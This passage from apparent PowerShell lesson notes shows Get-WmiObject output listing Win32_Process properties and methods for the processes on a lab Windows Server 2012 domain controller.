1188\nPeakPageFileUsage : 1796\nPeakVirtualSize : 89497600\nPeakWorkingSetSize : 6160\nPriority : 8\nPrivatePageCount : 1720320\nProcessId : 3492\nQuotaNonPagedPoolUsage : 12\nQuotaPagedPoolUsage : 152\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 153\nReadOperationCount : 2678\nReadTransferCount : 21424\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 0\nVirtualSize : 85270528\nWindowsVersion : 6.3.9600\nWorkingSetSize : 6270976\nWriteOperationCount : 1339\nWriteTransferCount : 5356\nPSComputerName : WIN-2012-DC\nProcessName : VBoxTray.exe\nHandles : 175\nVM : 85270528\nWS : 6270976\nPath : C:\\Windows\\System32\\VBoxTray.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3944\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3944\"\nCaption : cmd.exe\nCommandLine : \"C:\\Windows\\system32\\cmd.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712151804.014863-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : cmd.exe\nExecutablePath : C:\\Windows\\system32\\cmd.exe\nExecutionState :\nHandle : 3944\nHandleCount : 31\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : cmd.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 226\nOtherTransferCount : 3268\nPageFaults : 634\nPageFileUsage : 1516\nParentProcessId : 1188\nPeakPageFileUsage : 2612\nPeakVirtualSize : 13705216\nPeakWorkingSetSize : 2184\nPriority : 8\nPrivatePageCount : 1552384\nProcessId : 3944\nQuotaNonPagedPoolUsage : 3\nQuotaPagedPoolUsage : 24\nQuotaPeakNonPagedPoolUsage : 4\nQuotaPeakPagedPoolUsage : 25\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 0\nVirtualSize : 12517376\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2215936\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : cmd.exe\nHandles : 31\nVM : 12517376\nWS : 2215936\nPath : C:\\Windows\\system32\\cmd.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3120\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3120\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\nCreationClassName : Win32_Process\nCreationDate : 20170712151804.031029-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 3120\nHandleCount : 57\nInstallDate :\nKernelModeTime : 312500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 271\nOtherTransferCount : 12671\nPageFaults : 1915\nPageFileUsage : 1012\nParentProcessId : 3944\nPeakPageFileUsage : 1128\nPeakVirtualSize : 62922752\nPeakWorkingSetSize : 6096\nPriority : 8\nPrivatePageCount : 1036288\nProcessId : 3120\nQuotaNonPagedPoolUsage : 7\nQuotaPagedPoolUsage : 107\nQuotaPeakNonPagedPoolUsage : 8\nQuotaPeakPagedPoolUsage : 125\nReadOperationCount : 11\nReadTransferCount : 452\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 53530624\nWindowsVersion : 6.3.9600\nWorkingSetSize : 5320704\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : conhost.exe\nHandles : 57\nVM : 53530624\nWS : 5320704\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3832\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3832\"\nCaption : python.exe\nCommandLine : python -m SimpleHTTPServer\nCreationClassName : Win32_Process\nCreationDate : 20170712151820.171032-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : python.exe\nExecutablePath : C:\\Python27\\python.exe\nExecutionState :\nHandle : 3832\nHandleCount : 162\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : python.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 13025\nOtherTransferCount : 225557\nPageFaults : 2794\nPageFileUsage : 5664\nParentProcessId : 3944\nPeakPageFileUsage : 5816\nPeakVirtualSize : 88002560\nPeakWorkingSetSize : 10712\nPriority : 8\nPrivatePageCount : 5799936\nProcessId : 3832\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 146\nQuotaPeakNonPagedPoolUsage : 29\nQuotaPeakPagedPoolUsage : 146\nReadOperationCount : 218\nReadTransferCount : 883050\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 937500\nVirtualSize : 83390464\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10915840\nWriteOperationCount : 42\nWriteTransferCount : 983\nPSComputerName : WIN-2012-DC\nProcessName : python.exe\nHandles : 162\nVM : 83390464\nWS : 10915840\nPath : C:\\Python27\\python.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3116\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3116\"\nCaption : firefox.exe\nCommandLine : \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712152444.358480-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : firefox.exe\nExecutablePath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\nExecutionState :\nHandle : 3116\nHandleCount : 745\nInstallDate :\nKernelModeTime : 16875000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : firefox.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 30643\nOtherTransferCount : 536836\nPageFaults : 827850\nPageFileUsage : 141292\nParentProcessId : 1188\nPeakPageFileUsage : 180008\nPeakVirtualSize : 1768960000\nPeakWorkingSetSize : 218196\nPriority : 8\nPrivatePageCount : 144683008\nProcessId : 3116\nQuotaNonPagedPoolUsage : 62\nQuotaPagedPoolUsage : 607\nQuotaPeakNonPagedPoolUsage : 87\nQuotaPeakPagedPoolUsage : 731\nReadOperationCount : 4966\nReadTransferCount : 249050437\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 42\nUserModeTime : 86718750\nVirtualSize : 1681330176\nWindowsVersion : 6.3.9600\nWorkingSetSize : 198397952\nWriteOperationCount : 318221\nWriteTransferCount : 80063549\nPSComputerName : WIN-2012-DC\nProcessName : firefox.exe\nHandles : 745\nVM : 1681330176\nWS : 198397952\nPath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2992\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"2992\"\nCaption : firefox.exe\nCommandLine : \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -contentproc --channel=\"3116.0.1418504536\\2120526436\" -childID 1 -isForBrowser -intPrefs 5:50|6:-1|28:1000|33:20|34:10|43:128|\n 44:10000|48:0|50:400|51:1|52:0|53:0|58:0|59:120|60:120|133:2|134:1|147:5000|157:0|159:0|170:10000|182:-1|187:128|188:10000|189:0|195:24|196:32768|198:0|199:0|207:5|211:10485\n 76|212:100|213:5000|215:600|217:1|226:1|231:0|241:60000| -boolPrefs 1:0|2:0|4:0|26:1|27:1|30:0|35:1|36:0|37:0|38:0|39:1|40:0|41:1|42:1|45:0|46:0|47:0|49:0|54:1|55:1|56:0|57:\n 1|61:1|62:1|63:0|64:1|65:1|66:0|67:1|70:0|71:0|74:1|75:1|79:1|80:1|81:0|82:0|84:0|85:0|86:1|87:0|90:0|91:1|92:1|93:1|94:1|95:1|96:0|97:0|98:1|99:0|100:0|101:0|102:1|103:1|10\n 4:0|105:1|106:1|107:0|108:0|109:1|110:1|111:1|112:0|113:1|114:1|115:1|116:1|117:1|118:1|119:1|120:1|122:0|123:0|124:0|125:1|126:0|127:1|131:1|132:1|135:1|136:0|141:0|146:0|1\n 49:1|152:1|154:1|158:0|161:1|164:1|165:1|171:0|172:0|173:1|175:0|181:0|183:1|184:0|185:0|186:0|193:0|194:0|197:1|200:0|202:0|204:1|205:0|210:0|214:1|219:0|220:0|221:0|222:1|\n 224:1|225:1|228:0|233:0|234:0|235:1|236:1|237:0|238:1|239:1|240:0|242:0|243:0|245:0|253:1|254:1|255:0|256:0|257:0| -stringPrefs \"3:7;release|174:3;1.0|191:332; ¼½¾!???:?????\n %???????? ???????-’·?????????‹›?/???????????????/:?????????????????? ???????????????????./???????|192:8;moderate|227:38;{d130b7e4-5618-427c-891a-ee8a0888c2a8}|\"\n -greomni \"C:\\Program Files\\Mozilla Firefox\\omni.ja\" -appomni \"C:\\Program Files\\Mozilla Firefox\\browser\\omni.ja\" -appdir \"C:\\Program Files\\Mozilla Firefox\\browser\" 3116\n \"\\\\.\\pipe\\gecko-crash-server-pipe.3116\" tab\nCreationClassName : Win32_Process\nCreationDate : 20170712152446.155540-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : firefox.exe\nExecutablePath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\nExecutionState :\nHandle : 2992\nHandleCount : 286\nInstallDate :\nKernelModeTime : 2812500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : firefox.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 976\nOtherTransferCount : 12866\nPageFaults : 37617\nPageFileUsage : 34096\nParentProcessId : 3116\nPeakPageFileUsage : 44108\nPeakVirtualSize : 1400070144\nPeakWorkingSetSize : 82424\nPriority : 8\nPrivatePageCount : 34914304\nProcessId : 2992\nQuotaNonPagedPoolUsage : 30\nQuotaPagedPoolUsage : 454\nQuotaPeakNonPagedPoolUsage : 32\nQuotaPeakPagedPoolUsage : 474\nReadOperationCount : 3950\nReadTransferCount : 70436713\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 17\nUserModeTime : 6875000\nVirtualSize : 1378304000\nWindowsVersion : 6.3.9600\nWorkingSetSize : 72286208\nWriteOperationCount : 2307\nWriteTransferCount : 487820\nPSComputerName : WIN-2012-DC\nProcessName : firefox.exe\nHandles : 286\nVM : 1378304000\nWS : 72286208\nPath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"956\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"956\"\nCaption : notepad.exe\nCommandLine : \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\Administrator\\Desktop\\log.txt\nCreationClassName : Win32_Process\nCreationDate : 20170712153213.828260-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : notepad.exe\nExecutablePath : C:\\Windows\\system32\\NOTEPAD.EXE\nExecutionState :\nHandle : 956\nHandleCount : 94\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : notepad.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 173\nOtherTransferCount : 1420\nPageFaults : 2987\nPageFileUsage : 1460\nParentProcessId : 1188\nPeakPageFileUsage : 1612\nPeakVirtualSize : 101261312\nPeakWorkingSetSize : 9816\nPriority : 8\nPrivatePageCount : 1495040\nProcessId : 956\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 185\nQuotaPeakNonPagedPoolUsage : 9\nQuotaPeakPagedPoolUsage : 195\nReadOperationCount : 1\nReadTransferCount : 60\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 312500\nVirtualSize : 96096256\nWindowsVersion : 6.3.9600\nWorkingSetSize : 8454144\nWriteOperationCount : 8\nWriteTransferCount : 21612\nPSComputerName : WIN-2012-DC\nProcessName : notepad.exe\nHandles : 94\nVM : 96096256\nWS : 8454144\nPath : C:\\Windows\\system32\\NOTEPAD.EXE\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"3416\"\nCaption : powershell.exe\nCommandLine : \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3416\nHandleCount : 497\nInstallDate :\nKernelModeTime : 20937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 72072\nOtherTransferCount : 5471444\nPageFaults : 294868\nPageFileUsage : 111616\nParentProcessId : 1188\nPeakPageFileUsage : 113024\nPeakVirtualSize : 659030016\nPeakWorkingSetSize : 119420\nPriority : 8\nPrivatePageCount : 114294784\nProcessId : 3416\nQuotaNonPagedPoolUsage : 35\nQuotaPagedPoolUsage : 433\nQuotaPeakNonPagedPoolUsage : 38\nQuotaPeakPagedPoolUsage : 436\nReadOperationCount : 1024\nReadTransferCount : 3479940\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 10\nUserModeTime : 156093750\nVirtualSize : 656982016\nWindowsVersion : 6.3.9600\nWorkingSetSize : 120922112\nWriteOperationCount : 3\nWriteTransferCount : 5430\nPSComputerName : WIN-2012-DC\nProcessName : powershell.exe\nHandles : 497\nVM : 656982016\nWS : 120922112\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1928\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1928\"\nCaption : conhost.exe\nCommandLine : \\??\\C:\\Windows\\system32\\conhost.exe 0x4\nCreationClassName : Win32_Process\nCreationDate : 20170712164403.172486-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : conhost.exe\nExecutablePath : C:\\Windows\\system32\\conhost.exe\nExecutionState :\nHandle : 1928\nHandleCount : 56\nInstallDate :\nKernelModeTime : 17656250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : conhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 47060\nOtherTransferCount : 2990951\nPageFaults : 3531\nPageFileUsage : 5312\nParentProcessId : 3416\nPeakPageFileUsage : 5456\nPeakVirtualSize : 62046208\nPeakWorkingSetSize : 13364\nPriority : 8\nPrivatePageCount : 5439488\nProcessId : 1928\nQuotaNonPagedPoolUsage : 7\nQuotaPagedPoolUsage : 113\nQuotaPeakNonPagedPoolUsage : 8\nQuotaPeakPagedPoolUsage : 114\nReadOperationCount : 23\nReadTransferCount : 756\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 1250000\nVirtualSize : 61644800\nWindowsVersion : 6.3.9600\nWorkingSetSize : 13651968\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : conhost.exe\nHandles : 56\nVM : 61644800\nWS : 13651968\nPath : C:\\Windows\\system32\\conhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1816\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1816\"\nCaption : WmiPrvSE.exe\nCommandLine : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712164708.672298-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : WmiPrvSE.exe\nExecutablePath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nExecutionState :\nHandle : 1816\nHandleCount : 327\nInstallDate :\nKernelModeTime : 10781250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : WmiPrvSE.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 5019\nOtherTransferCount : 78910\nPageFaults : 42193\nPageFileUsage : 21748\nParentProcessId : 572\nPeakPageFileUsage : 24180\nPeakVirtualSize : 103436288\nPeakWorkingSetSize : 29212\nPriority : 8\nPrivatePageCount : 22269952\nProcessId : 1816\nQuotaNonPagedPoolUsage : 22\nQuotaPagedPoolUsage : 140\nQuotaPeakNonPagedPoolUsage : 26\nQuotaPeakPagedPoolUsage : 156\nReadOperationCount : 7\nReadTransferCount : 2721134\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 5312500\nVirtualSize : 91705344\nWindowsVersion : 6.3.9600\nWorkingSetSize : 27447296\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : WmiPrvSE.exe\nHandles : 327\nVM : 91705344\nWS : 27447296\nPath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"932\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"932\"\nCaption : WmiApSrv.exe\nCommandLine : C:\\Windows\\system32\\wbem\\WmiApSrv.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712164914.625986-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : WmiApSrv.exe\nExecutablePath : C:\\Windows\\system32\\wbem\\WmiApSrv.exe\nExecutionState :\nHandle : 932\nHandleCount : 128\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : WmiApSrv.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 350\nOtherTransferCount : 24138\nPageFaults : 1338\nPageFileUsage : 1172\nParentProcessId : 440\nPeakPageFileUsage : 1264\nPeakVirtualSize : 29896704\nPeakWorkingSetSize : 4956\nPriority : 8\nPrivatePageCount : 1200128\nProcessId : 932\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 56\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 57\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 0\nVirtualSize : 29233152\nWindowsVersion : 6.3.9600\nWorkingSetSize : 5062656\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : WmiApSrv.exe\nHandles : 128\nVM : 29233152\nWS : 5062656\nPath : C:\\Windows\\system32\\wbem\\WmiApSrv.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"840\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"840\"\nCaption : WmiPrvSE.exe\nCommandLine : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712165108.172589-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : WmiPrvSE.exe\nExecutablePath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\nExecutionState :\nHandle : 840\nHandleCount : 136\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : WmiPrvSE.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 120\nOtherTransferCount : 122\nPageFaults : 1403\nPageFileUsage : 2060\nParentProcessId : 572\nPeakPageFileUsage : 2060\nPeakVirtualSize : 35057664\nPeakWorkingSetSize : 5352\nPriority : 8\nPrivatePageCount : 2109440\nProcessId : 840\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 62\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 63\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 156250\nVirtualSize : 35057664\nWindowsVersion : 6.3.9600\nWorkingSetSize : 5480448\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : WmiPrvSE.exe\nHandles : 136\nVM : 35057664\nWS : 5480448\nPath : C:\\Windows\\system32\\wbem\\wmiprvse.exe\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_process | Select Name\n\nName\n----\nSystem Idle Process\nSystem\nsmss.exe\ncsrss.exe\ncsrss.exe\nwininit.exe\nwinlogon.exe\nservices.exe\nlsass.exe\nsvchost.exe\nsvchost.exe\ndwm.exe\nVBoxService.exe\nsvchost.exe\nsvchost.exe\nsvchost.exe\nsvchost.exe\nsvchost.exe\nspoolsv.exe\nMicrosoft.ActiveDirectory.WebServices.exe\ndfsrs.exe\ndns.exe\nismserv.exe\nwlms.exe\ndfssvc.exe\nvds.exe\nsvchost.exe\nsvchost.exe\nsvchost.exe\nmsdtc.exe\ntaskhostex.exe\nexplorer.exe\nVBoxTray.exe\ncmd.exe\nconhost.exe\npython.exe\nfirefox.exe\nfirefox.exe\nnotepad.exe\npowershell.exe\nconhost.exe\nWmiPrvSE.exe\nWmiApSrv.exe\nWmiPrvSE.exe\n\nPS C:\\Users\\Administrator>\n```\n\n- Exploring ```Methods```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_process -List\n\n NameSpace: ROOT\\cimv2\n\nName Methods Properties\n---- ------- ----------\nWin32_Process {Create, Terminat... {Caption, CommandLine, CreationClassName, CreationDate...}\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_process -List | Select-Object -ExpandProperty Methods\n\nName : Create\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Constructor, Implemented, MappingStrings, Privileges...}\n\nName : Terminate\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Destructor, Implemented, MappingStrings, Privileges...}\n\nName : GetOwner\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, MappingStrings, ValueMap}\n\nName : GetOwnerSid\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, MappingStrings, ValueMap}\n\nName : SetPriority\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, MappingStrings, ValueMap}\n\nName : AttachDebugger\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, ValueMap}\n\nName : GetAvailableVirtualSize\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, ValueMap}\n\nPS C:\\Users\\Administrator>\n```\n" }, { "path": "33-Using-WMI-in-Powershell-Part-2.md", "content": "#### 33. Using WMI in Powershell Part 2\n\n- Using ```Get-WmiObject``` - ```Local```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"0\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"0\"\nCaption : System Idle Process\nCommandLine :\nCreationClassName : Win32_Process\nCreationDate :\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : System Idle Process\nExecutablePath :\nExecutionState :\nHandle : 0\nHandleCount : 0\nInstallDate :\nKernelModeTime : 199884687500\nMaximumWorkingSetSize :\nMinimumWorkingSetSize :\nName : System Idle Process\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 0\nOtherTransferCount : 0\nPageFaults : 1\nPageFileUsage : 0\nParentProcessId : 0\nPeakPageFileUsage : 0\nPeakVirtualSize : 65536\nPeakWorkingSetSize : 4\nPriority : 0\nPrivatePageCount : 0\nProcessId : 0\nQuotaNonPagedPoolUsage : 0\nQuotaPagedPoolUsage : 0\nQuotaPeakNonPagedPoolUsage : 